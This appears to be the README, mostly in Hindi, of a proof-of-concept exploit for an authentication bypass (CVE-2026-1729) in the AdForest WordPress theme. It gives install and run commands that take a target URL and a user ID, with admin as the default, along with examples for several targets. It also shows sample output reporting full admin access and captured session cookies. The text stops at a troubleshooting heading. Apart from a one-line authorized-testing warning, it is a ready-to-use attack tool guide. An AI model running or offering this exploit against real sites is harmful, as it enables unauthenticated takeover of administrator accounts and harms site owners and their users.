
The AdForest theme for WordPress is vulnerable to authentication bypass in all versions including, 6.0.12. This is due to the plugin not properly verifying a user's identity prior to authenticating them through the 'sb_login_user_with_otp_fun' function. This makes it possible for unauthenticated attackers to log in, including admin
CVE-2026-1729 के लिए सरल प्रूफ ऑफ कॉन्सेप्ट (PoC) - AdForest WordPress थीम में प्रमाणीकरण बाईपास भेद्यता। लेखक: f3ds cr3w est 2oo2 ब्लॉग
requests लाइब्रेरीpip install requests
python poc/exploit.py https://target-site.com
python poc/exploit.py https://target-site.com --user-id 2
# डिफ़ॉल्ट व्यवस्थापक (यूज़र आईडी 1) का शोषण करें
python poc/exploit.py https://example.com
# विशिष्ट उपयोगकर्ता खाते का शोषण करें
python poc/exploit.py https://example.com --user-id 5
# कई लक्ष्यों का परीक्षण करें
python poc/exploit.py https://site1.com
python poc/exploit.py https://site2.com --user-id 3
CVE-2026-1729 - AdForest WordPress प्रमाणीकरण बाईपास
=======================================================
चेतावनी: केवल अधिकृत परीक्षण के लिए!
=======================================================
[+] लक्ष्य: https://example.com
[+] लक्ष्यित उपयोगकर्ता आईडी: 1
[+] एक्सप्लॉइट भेजा जा रहा है: https://example.com/wp-admin/admin-ajax.php
[+] सफलता! व्यवस्थापक पहुंच प्रदान की गई
[+] व्यवस्थापक URL: https://example.com/wp-admin/
[+] सत्र कुकीज़: {'wp-settings-time-1': '1234567890', 'wordpress_logged_in_...': '...'}
[+] admin के रूप में लॉग इन किया गया
🎯 एक्सप्लॉइट सफलतापूर्वक पूरा हुआ!
अब आपके पास WordPress साइट पर व्यवस्थापक पहुंच है।
/wp-admin/ तक पूर्ण व्यवस्थापक पहुंच मिलती हैयदि एक्सप्लॉइट विफल होता है: